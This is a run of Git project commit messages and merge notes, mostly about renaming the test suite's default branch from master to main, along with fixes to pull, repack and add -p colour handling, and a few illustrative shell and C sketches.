Note that t5541 uses the reversed `master` name: `retsam`. We replace it
by the equivalent for `main`: `niam`.
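A quick way to see the effect of these expressions is to feed them a
few sample lines (the input below is invented for this sketch, and
rename_default_branch is a hypothetical wrapper that reads stdin rather
than editing files in place):

```shell
# Hypothetical wrapper around the same four sed expressions.
rename_default_branch () {
	sed -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
		-e 's/Master/Main/g' -e 's/retsam/niam/g'
}

printf '%s\n' \
	'git push origin master' \
	'echo retsam' \
	'Master branch' |
rename_default_branch
```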
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t5526, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t55[23]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -e 's/naster/nain/g' -- \
t55[23]*.sh &&
git checkout HEAD -- t5526\*)
Note that t5533 contains a variation of the name `master` (`naster`)
that we rename here, too.
This commit allows us to define
`GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main` for that range of tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t551*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t550*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an upcoming commit, we will use `main` as the default branch name in
t5503 instead of `master`. This will require extra padding in ASCII-art
commit graphs, which we hereby add preemptively.
By doing this preemptively rather than after the commit applying the
search-and-replace, it is more obvious that we caught all aligned
comments that are affected by the latter commit.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t5310, which is developed independently of the
current patch series at the time of writing, we now use `main` as
default branch in t5[0-4]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t5[0-4]*.sh &&
git checkout HEAD -- t5310\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are about to search-and-replace all mentions of `master` in t5323 by
`main`, which is two characters shorter. To prepare for that, let's add
padding to centered lines that will make them briefly uncentered, but
will be re-centered in the commit that performs that rename.
Doing it this way (instead of padding after replacing) makes it easier
to verify the validity of the patch that replaces `master` by `main`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t4013 and t4015, which see independent development
elsewhere at the time of writing, we use `main` as the default branch
name in t4*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t4*.sh t4211/*.export &&
git checkout HEAD -- t4013\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t3[5-9]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t3404, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t34*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t34*.sh &&
git checkout HEAD -- t3404\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are about to adjust t3416 for the new default branch name `main`.
This name is two characters shorter and therefore needs two spaces more
padding to align correctly.
Adjusting the alignment before the big search-and-replace makes it
easier to verify that the final result does not leave any misaligned
lines behind.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t3040, which sees independent development elsewhere
at the time of writing, we transition above-mentioned tests to the
default branch name `main`. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t3[0-3]*.sh t3206/* &&
git checkout HEAD -- t3040\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t2106, which sees independent development elsewhere
at the time of writing, we transition above-mentioned tests to the
default branch name `main`. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t2*.sh &&
git checkout HEAD -- t2106\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t1309, which sees independent development elsewhere
at the time of writing, we transition above-mentioned tests to the
default branch name `main`. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -e 's/naster/nain/g' -- t[01]*.sh &&
git checkout HEAD -- t1309\*)
Note that t5533 contains a variation of the name `master` (`naster`)
that we rename here, too.
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Helped-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are about to adjust t0060 for the new default branch name `main`.
This name is two characters shorter and therefore needs two spaces more
padding to align correctly.
Adjusting the alignment before the big search-and-replace makes it
easier to verify that the final result does not leave any misaligned
lines behind.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In addition to the manual adjustment to let the `linux-gcc` CI job run
the test suite with `master` and then with `main`, this patch makes sure
that GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME is set in all test scripts
that currently rely on the initial branch name being `master` by default.
To determine which test scripts to mark up, the first step was to
force-set the default branch name to `master` in
- all test scripts that contain the keyword `master`,
- t4211, which expects `t/t4211/history.export` with a hard-coded ref to
initialize the default branch,
- t5560 because it sources `t/t556x_common` which uses `master`,
- t8002 and t8012 because both source `t/annotate-tests.sh` which also
uses `master`.
This trick was performed by this command:
$ sed -i '/^ *\. \.\/\(test-lib\|lib-\(bash\|cvs\|git-svn\)\|gitweb-lib\)\.sh$/i\
GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=master\
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME\
' $(git grep -l master t/t[0-9]*.sh) \
t/t4211*.sh t/t5560*.sh t/t8002*.sh t/t8012*.sh
After that, careful, manual inspection revealed that some of the test
scripts containing the needle `master` do not actually rely on a
specific default branch name: either they mention `master` only in a
comment, or they initialize that branch specifically, or they do not
actually refer to the current default branch. Therefore, the
aforementioned modification was undone in those test scripts thusly:
$ git checkout HEAD -- \
t/t0027-auto-crlf.sh t/t0060-path-utils.sh \
t/t1011-read-tree-sparse-checkout.sh \
t/t1305-config-include.sh t/t1309-early-config.sh \
t/t1402-check-ref-format.sh t/t1450-fsck.sh \
t/t2024-checkout-dwim.sh \
t/t2106-update-index-assume-unchanged.sh \
t/t3040-subprojects-basic.sh t/t3301-notes.sh \
t/t3308-notes-merge.sh t/t3423-rebase-reword.sh \
t/t3436-rebase-more-options.sh \
t/t4015-diff-whitespace.sh t/t4257-am-interactive.sh \
t/t5323-pack-redundant.sh t/t5401-update-hooks.sh \
t/t5511-refspec.sh t/t5526-fetch-submodules.sh \
t/t5529-push-errors.sh t/t5530-upload-pack-error.sh \
t/t5548-push-porcelain.sh \
t/t5552-skipping-fetch-negotiator.sh \
t/t5572-pull-submodule.sh t/t5608-clone-2gb.sh \
t/t5614-clone-submodules-shallow.sh \
t/t7508-status.sh t/t7606-merge-custom.sh \
t/t9302-fast-import-unpack-limit.sh
We excluded one set of test scripts in these commands, though: the range
of `git p4` tests. The reason? `git p4` stores the (foreign) remote
branch in the branch called `p4/master`, which is obviously not the
default branch. Manual analysis revealed that only five of these tests
actually require a specific default branch name to pass; they were
modified thusly:
$ sed -i '/^ *\. \.\/lib-git-p4\.sh$/i\
GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=master\
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME\
' t/t980[0167]*.sh t/t9811*.sh
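To see what the `i\` command does, the same sed script can be run
against a small sample instead of the real test scripts. In this sketch
mark_up is a hypothetical wrapper that reads stdin rather than using
`-i`, and the three input lines are invented:

```shell
# Hypothetical wrapper: insert the two assignment lines right before
# the line that sources lib-git-p4.sh.
mark_up () {
	sed '/^ *\. \.\/lib-git-p4\.sh$/i\
GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=master\
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME\
'
}

printf '%s\n' \
	'#!/bin/sh' \
	"test_description='example'" \
	'. ./lib-git-p4.sh' |
mark_up
```

The inserted text ends up ahead of the `. ./lib-git-p4.sh` line, so the
variable is already set and exported when the library is sourced.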
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In d18c950a69 (pull: warn if the user didn't say whether to rebase or
to merge, 2020-03-09), a new hint was introduced to encourage users to
make a conscious decision about whether they want their pull to merge or
to rebase by configuring the `pull.rebase` setting.
This warning was clearly intended to advise users, but as pointed out in
https://lore.kernel.org/git/87ima2rdsm.fsf%40evledraar.gmail.com, it
uses `warning()` instead of `advise()`.
One consequence is that the advice is not colorized in the same manner
as other, similar messages. So let's use `advise()` instead.
Pointed-out-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We do not need to hard-code the actual branch name, as we can use the
`test_commit` function to simplify the code and use the tag it
generates, thereby being a lot more precise in what we want.
Strangely enough, this test case would have succeeded even with an
overridden default branch name, obviously for the wrong reason. Let's
verify that it passes for the expected reason, by looking for a
tell-tale in Git's output.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The `onbranch` test cases touched by this patch do not actually try to
include any other config. Their purpose is to avoid regressing on two
bugs in the `include.onbranch:<name>.path` code that we fixed in the
past, bugs that are actually unrelated to any concrete branch name.
The first bug was fixed in 85fe0e800c (config: work around bug with
includeif:onbranch and early config, 2019-07-31). Essentially, when
reading early config, there would be a catch-22 trying to access the
refs, and therefore we simply cannot evaluate the condition at that
point. The test case ensures that we avoid emitting this bogus message:
BUG: refs.c:1851: attempting to get main_ref_store outside of repository
The second test case concerns the non-Git scenario, where we simply do
not have a current branch to begin with (because we don't have a
repository in the first place), and the test case was introduced in
22932d9169 (config: stop checking whether the_repository is NULL,
2019-08-06) to ensure that we don't cause a segmentation fault should
the code still incorrectly try to look at any ref.
In short, neither of these two test cases will ever look at a current
branch name, even in case of regressions. Therefore, the actual branch
name does not matter at all. We can therefore easily avoid
racially-charged branch names here, and that's what this patch does.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
compare_tasks_by_selection() is used with QSORT and gets passed pointers
to the elements of "static struct maintenance_task tasks[]". It casts
the *addresses* of these passed pointers to element pointers, though,
and thus effectively compares some unrelated values from the stack. Fix
the casts to actually compare array elements.
Detected by UBSan (make SANITIZE=undefined test).
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git blame --ignore-revs-file=<file>" learned to ignore a
non-existent object name in the input, instead of complaining.
* jc/blame-ignore-fix:
blame: silently ignore invalid ignore file objects
"make DEVELOPER=1 sparse" used to run sparse and let it emit
warnings; now such warnings will cause an error.
* jc/sparse-error-for-developer-build:
Makefile: enable -Wsparse-error for DEVELOPER build
"git blame -L :funcname -- path" did not work well for a path for
which a userdiff driver is defined.
* pb/blame-funcname-range-userdiff:
blame: simplify 'setup_blame_bloom_data' interface
blame: simplify 'setup_scoreboard' interface
blame: enable funcname blaming with userdiff driver
line-log: mention both modes in 'blame' and 'log' short help
doc: add more pointers to gitattributes(5) for userdiff
blame-options.txt: also mention 'funcname' in '-L' description
doc: line-range: improve formatting
doc: log, gitk: move '-L' description to 'line-range-options.txt'
Preparation for a new merge strategy.
* en/merge-ort-api-null-impl:
merge,rebase,revert: select ort or recursive by config or environment
fast-rebase: demonstrate merge-ort's API via new test-tool command
merge-ort-wrappers: new convience wrappers to mimic the old merge API
merge-ort: barebones API of new merge strategy with empty implementation
Parts of "git maintenance" to ease writing crontab entries (and
other scheduling system configuration) for it.
* ds/maintenance-part-3:
maintenance: add troubleshooting guide to docs
maintenance: use 'incremental' strategy by default
maintenance: create maintenance.strategy config
maintenance: add start/stop subcommands
maintenance: add [un]register subcommands
for-each-repo: run subcommands on configured repos
maintenance: add --schedule option and config
maintenance: optionally skip --auto process
"git rebase -i" did not store ORIG_HEAD correctly.
* pw/rebase-i-orig-head:
rebase -i: simplify get_revision_ranges()
rebase -i: use struct object_id when writing state
rebase -i: use struct object_id rather than looking up commit
rebase -i: stop overwriting ORIG_HEAD buffer
"git format-patch --output=there" did not work as expected and
instead crashed. The option is now supported.
* jk/format-patch-output:
format-patch: support --output option
format-patch: tie file-opening logic to output_directory
format-patch: refactor output selection
"git log -L<range>:<path>" is documented to take no pathspec, but
this was not enforced by the command line option parser, which has
been corrected.
* jc/line-log-takes-no-pathspec:
log: diagnose -L used with pathspec as an error
The code to see if "git stash drop" can safely remove refs/stash
has been made more careful.
* rs/empty-reflog-check-fix:
stash: simplify reflog emptiness check
Add t/perf support for fsmonitor.
* nk/perf-fsmonitor:
t/perf/fsmonitor: add benchmark for dirty status
t/perf/fsmonitor: perf comparison of multiple fsmonitor integrations
t/perf/fsmonitor: initialize test with git reset
t/perf/fsmonitor: factor setup for fsmonitor into function
t/perf/fsmonitor: silence initial git commit
t/perf/fsmonitor: shorten DESC to basename
t/perf/fsmonitor: factor description out for readability
t/perf/fsmonitor: improve error message if typoing hook name
t/perf/fsmonitor: move watchman setup to one-time-repo-setup
t/perf/fsmonitor: separate one time repo initialization
Preparation for a new merge strategy.
* en/merge-tests:
t6423: add more details about direct resolution of directories
t6423: note improved ort handling with untracked files
t6423, t6436: note improved ort handling with dirty files
merge tests: expect slight differences in output for recursive vs. ort
t6423: expect improved conflict markers labels in the ort backend
t6404, t6423: expect improved rename/delete handling in ort backend
t6416: correct expectation for rename/rename(1to2) + directory/file
merge tests: expect improved directory/file conflict handling in ort
t/: new helper for tests that pass with ort but fail with recursive
Prepare a test script for the transition of the default branch name to
'main'.
* js/default-branch-name-adjust-t5515:
t5515: use `main` as the name of the main branch for testing (conclusion)
t5515: use `main` as the name of the main branch for testing (part 3)
t5515: use `main` as the name of the main branch for testing (part 2)
t5515: use `main` as the name of the main branch for testing (part 1)
"git fetch --depth=<n>" over the stateless RPC / smart HTTP
transport handled EOF from the client poorly at the server end.
* dd/upload-pack-stateless-eof:
upload-pack: allow stateless client EOF just prior to haves
This comment was most likely a "note to self" during the development of
1c3e5c4ebc (Tests for core subproject support, 2007-04-19) and is
neither needed nor comprehensible at this point. Let's remove it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'test_set_prereq's description claims that prereqs can be specified to
'test_expect_code', but that is not the case (it is not meant to run a
test _case_, but a git command), so remove it.
OTOH that description doesn't mention 'test_external' and
'test_external_without_stderr' that do accept prereqs, so mention
them.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some test prereqs depend on other prereqs, so in a couple of cases we
have nested prereqs that look something like this:
test_lazy_prereq FOO '
test_have_prereq BAR &&
check-foo
'
This can be problematic, because lazy prereqs are evaluated in the
'$TRASH_DIRECTORY/prereq-test-dir' directory, which is the same for
every prereq, and which is automatically removed after the prereq has
been evaluated. So if the inner prereq (BAR above) is a lazy prereq
that hasn't been evaluated yet, then after its evaluation the
'prereq-test-dir' shared with the outer prereq will be removed.
Consequently, 'check-foo' will find itself in a non-existing
directory, and won't be able to create/access any files in its cwd,
which could result in an unfulfilled outer prereq.
Luckily, this doesn't affect any of our current nested prereqs, either
because the inner prereq is not a lazy prereq (e.g. MINGW, CYGWIN or
PERL), or because the outer prereq happens to be checked without
touching any paths in its cwd (GPGSM and RFC1991 in 'lib-gpg.sh').
So to prevent nested prereqs from interfering with each other let's
evaluate each prereq in its own dedicated directory by appending the
prereq's name to the directory name, e.g. 'prereq-test-dir-SYMLINKS'.
In the test we check not only that the prereq test dir is still there,
but also that the inner prereq can't mess with the outer prereq's
files.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
During the transition of the test suite to a new default branch name, it
was noticed that this test case succeeded for the wrong reason when the
default branch name was overridden.
While we fixed that in the previous commit, let's make sure that we look
for a tell-tale in the error message that the `git checkout` failed for
the reason we wanted it to fail.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We do have this wonderful shortcut `git checkout -` to go back to the
previous branch, thanks to the reflog.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We settled on the style where the test cases' code starts by the opening
single quote being on the `test_expect_*` line, and the closing quote
being in its own line after the code.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When 'git repack' creates a pack with the same name as any existing
pack, it moves the existing one to 'old-pack-xxx.{pack,idx,...}' and
then renames the new one into place.
Eventually, it would be nice to have 'git repack' allow for writing a
multi-pack index at the critical time (after the new packs have been
written / moved into place, but before the old ones have been deleted).
Guessing that this option might be called '--write-midx', this makes the
following situation (where repacks are issued back-to-back without any
new objects) impossible:
$ git repack -adb
$ git repack -adb --write-midx
In the second repack, the existing packs are overwritten verbatim with
the same rename-to-old sequence. At that point, the current MIDX is
invalidated, since it refers to now-missing packs. So that code wants to
be run after the MIDX is re-written. But (prior to this patch) the new
MIDX can't be written until the new packs are moved into place. So, we
have a circular dependency.
This is all hypothetical, since no code currently exists to write a MIDX
safely during a 'git repack' (the 'GIT_TEST_MULTI_PACK_INDEX' does so
unsafely). Putting hypothetical aside, though: why do we need to rename
existing packs to be prefixed with 'old-' anyway?
This behavior dates all the way back to 2ad47d6 (git-repack: Be
careful when updating the same pack as an existing one., 2006-06-25).
2ad47d6 is mainly concerned about a case where a newly written pack
would have a different structure than its index. This used to be
possible when the pack name was a hash of the set of objects. Under this
naming scheme, two packs that store the same set of objects could differ
in delta selection, object positioning, or both. If this happened, then
any such packs would be unreadable in the instant between copying the
new pack and new index (i.e., either the index or pack will be stale
depending on the order that they were copied).
But since 1190a1a (pack-objects: name pack files after trailer hash,
2013-12-05), this is no longer possible, since pack files are named not
after their logical contents (i.e., the set of objects), but by the
actual checksum of their contents. So, this old- behavior can safely go,
which allows us to avoid our circular dependency above.
In addition to avoiding the circular dependency, this patch also makes
'git repack' a lot simpler, since we don't have to deal with failures
encountered when renaming existing packs to be prefixed with 'old-'.
This patch is mostly limited to removing code paths that deal with the
'old' prefixing, with the exception of files that include the pack's
name in their own filename, like .idx, .bitmap, and related files. The
exception is that we want to continue to trust what pack-objects wrote.
That is, it is not the case that we pretend as if pack-objects didn't
write files identical to ones that already exist, but rather that we
respect what pack-objects wrote as the source of truth. That cuts two
ways:
- If pack-objects produced an identical pack to one that already
exists with a bitmap, but did not produce a bitmap, we remove the
bitmap that already exists. (This behavior is codified in t7700.14).
- If pack-objects produced an identical pack to one that already
exists, we trust the just-written version of the corresponding .idx,
.promisor, and other files over the ones that already exist. This
ensures that we use the most up-to-date versions of these files,
which is safe even in the face of format changes in, say, the .idx
file (which would not be reflected in the .idx file's name).
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Imitating cac42e47 (ci: avoid using the deprecated `set-env`
construct, 2020-11-07), avoid deprecated ::set-env and use the
recommended alternative instead in print-test-failures.sh
Helped-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is possible for the name of an alias to end with the name of another
alias, in which case the code will incorrectly detect a loop.
We can fix that by adding an extra space between words.
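The false positive can be sketched in C, assuming the list of
already-visited aliases is kept as a single space-separated string. The
names seen_naive() and seen_delimited() are hypothetical and exist only
for this illustration; the actual code is not written in C.

```c
#include <stdio.h>
#include <string.h>

/*
 * Naive check: search for "<name> " anywhere in the list. An alias
 * whose name merely ends with <name> (e.g. "foo-co" for "co") matches
 * as well, so a loop is reported where there is none.
 */
int seen_naive(const char *list, const char *name)
{
	char needle[64];

	snprintf(needle, sizeof(needle), "%s ", name);
	return strstr(list, needle) != NULL;
}

/*
 * Delimited check: every word in the list is preceded and followed by
 * a space, and the needle is " <name> ", so only whole words match.
 */
int seen_delimited(const char *list, const char *name)
{
	char needle[64];

	snprintf(needle, sizeof(needle), " %s ", name);
	return strstr(list, needle) != NULL;
}
```

With the list "foo-co ", the naive check reports "co" as already seen;
with the list " foo-co ", the delimited check does not.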
Suggested-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Ever since 'git pull' learned '--recurse-submodules' in a6d7eb2c7a
(pull: optionally rebase submodules (remote submodule changes only),
2017-06-23), we check if there are local submodule modifications by
checking the revision range 'curr_head --not rebase_fork_point'.
The goal of this check is to abort the pull if there are submodule
modifications in the local commits being rebased, since this scenario is
not supported.
However, the actual range of commits being rebased is not
'rebase_fork_point..curr_head'; as the logic in
'get_rebase_newbase_and_upstream' reveals, it is 'upstream..curr_head'.
If the 'git merge-base --fork-point' invocation in
'get_rebase_fork_point' fails to find a fork point between the current
branch and the remote-tracking branch we are pulling from,
'rebase_fork_point' is null and since 4d36f88be7 (submodule: do not pass
null OID to setup_revisions, 2018-05-24), 'submodule_touches_in_range'
checks 'curr_head' and all its ancestors for submodule modifications.
Since it is highly likely that there are submodule modifications in this
range (which is in effect the whole history of the current branch), this
prevents 'git pull --rebase --recurse-submodules' from succeeding if no
fork point exists between the current branch and the remote-tracking
branch being pulled. This can happen, for example, when the current
branch was forked from a commit which was never recorded in the reflog
of the remote-tracking branch we are pulling, as the last two paragraphs
of the "Discussion on fork-point mode" section in git-merge-base(1)
explain.
Fix this bug by passing 'upstream' instead of 'rebase_fork_point' as the
'excl_oid' argument to 'submodule_touches_in_range'.
Reported-by: Brice Goglin <bgoglin@free.fr>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can be hard at first glance to distinguish what is different between
the two tests 'recursive rebasing pull' and 'pull rebase recursing fails
with conflicts' in 't5572-pull-submodule.sh', and to understand how they
relate to the scenarios described in a6d7eb2c7a (pull: optionally rebase
submodules (remote submodule changes only), 2017-06-23), which
implemented '--recurse-submodules' for 'git pull' and added these tests.
Rename the tests to be more descriptive and add some bullet-point
comments describing the different scenarios.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Test 5572.63 ("branch has no merge base with remote-tracking
counterpart") was introduced in 4d36f88be7 (submodule: do not pass null
OID to setup_revisions, 2018-05-24), as a regression test for the bug
this commit was fixing (preventing a 'fatal: bad object' error when the
current branch and the remote-tracking branch we are pulling have no
merge-base).
However, the commit message for 4d36f88be7 does not describe in which
real-life situation this bug was encountered. The brief discussion on the
mailing list [1] does not either.
The regression test is not really representative of a real-life
scenario: both the local repository and its upstream have only a single
commit, and the "no merge-base" scenario is simulated by recreating this
root commit in the local repository using 'git commit-tree' before
calling 'git pull --rebase --recurse-submodules'. The rebase succeeds
and results in the local branch being reset to the same root commit as
the upstream branch.
The fix in 4d36f88be7 modifies 'submodule.c::submodule_touches_in_range'
so that if 'excl_oid' is null, which is the case when the 'git merge-base
--fork-point' invocation in 'builtin/pull.c::get_rebase_fork_point'
errors (no fork-point), then instead of 'incl_oid --not excl_oid' being
passed to setup_revisions, only 'incl_oid' is passed, and
'submodule_touches_in_range' examines 'incl_oid' and all its ancestors
to verify that they do not touch the submodule.
In test 5572.63, the recreated lone root commit in the local repository is
thus the only commit being examined by 'submodule_touches_in_range', and
this commit *adds* the submodule. However, 'submodule_touches_in_range'
*succeeds* because 'combine-diff.c::diff_tree_combined' (see the
backtrace below) returns early since this commit is the root commit
and has no parents.
#0 diff_tree_combined at combine-diff.c:1494
#1 0x0000000100150cbe in diff_tree_combined_merge at combine-diff.c:1649
#2 0x00000001002c7147 in collect_changed_submodules at submodule.c:869
#3 0x00000001002c7d6f in submodule_touches_in_range at submodule.c:1268
#4 0x00000001000ad58b in cmd_pull at builtin/pull.c:1040
In light of all this, add a note in t5572 documenting this peculiar
test.
[1] https://lore.kernel.org/git/20180524204729.19896-1-jonathantanmy@google.com/t/#u
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The function 'run_rebase' is responsible for constructing the
command line to be passed to 'git rebase'. This includes both forwarding
pass-through options given to 'git pull' as well as computing the <newbase>
and <upstream> arguments to 'git rebase'.
A following commit will need to access the <upstream> argument in
'cmd_pull' to fix a bug with 'git pull --rebase --recurse-submodules'.
In order to do so, refactor the code so that the <newbase> and
<upstream> commits are computed in a new, separate function,
'get_rebase_newbase_and_upstream'.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that the Perl version produces the same output as the built-in
version (mostly fixing bugs in the latter), let's add a regression test
to verify that it stays this way.
Note that we only `grep` for the colored error message instead of
verifying that the entire `stderr` consists of just this one line: when
running the test script using the `-x` option to trace the
commands, the sub-shell in `force_color` causes those commands to be
traced into `err.raw` (unless running in Bash where we set the
`BASH_XTRACEFD` variable to avoid that).
Also note that the color reset in the `<BLUE>+<RESET><BLUE>new<RESET>`
line might look funny and unnecessary, as the corresponding `old` line
does not reset the color after the diff marker only to turn the color
back on right away.
However, this is a (necessary) side effect of the white-space check: in
`emit_line_ws_markup()`, we first emit the diff marker via
`emit_line_0()` and then the rest of the line via `ws_check_emit()`. To
leave them somewhat decoupled, the color has to be reset after the diff
marker to allow for the rest of the line to start with another color (or
inverted, in case of white-space issues).
Finally, we have to simulate hunk editing: the `git add -p` command
cannot rely on the internal diff machinery for coloring after letting
the user edit a hunk; it has to "re-color" the edited hunk. This is the
primary reason why that command is interested in the exact values of the
`color.diff.*` settings in the first place. To test this re-coloring, we
therefore have to pretend to edit a hunk and then show that hunk in the
regression test.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git's diff machinery allows users to override the colors to use in
diffs, even the plain-colored context lines. As of 8dbf3eb685 (diff.h:
rename DIFF_PLAIN color slot to DIFF_CONTEXT, 2015-05-27), the preferred
name of the config setting is `color.diff.context`, although Git still
allows `color.diff.plain`.
In the context of `git add -p`, this logic is a bit hard to replicate:
`git_diff_basic_config()` reads all config values sequentially and if it
sees _any_ `color.diff.context` or `color.diff.plain`, it accepts the
new color. The Perl version of `git add -p` needs to go through `git
config --get-color`, though, which allows only one key to be specified.
The same goes for the built-in version of `git add -p`, which has to go
through `repo_config_get_value()`.
The best we can do here is to look for `.context` and if none is found,
fall back to looking for `.plain`, and if still not found, fall back to
the hard-coded default (which in this case is simply the empty string,
as context lines are typically rendered without color).
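The lookup order described above can be sketched as follows. This is an
illustration only: struct config_entry, lookup() and context_color() are
hypothetical stand-ins, not the config API that either version of
`git add -p` actually uses.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for one parsed config entry. */
struct config_entry {
	const char *key;
	const char *value;
};

/* Return the last value set for `key`, or NULL if it is not set. */
static const char *lookup(const struct config_entry *cfg, size_t n,
			  const char *key)
{
	const char *found = NULL;
	size_t i;

	for (i = 0; i < n; i++)
		if (!strcmp(cfg[i].key, key))
			found = cfg[i].value;
	return found;
}

/* Prefer `.context`, fall back to `.plain`, then to the empty default. */
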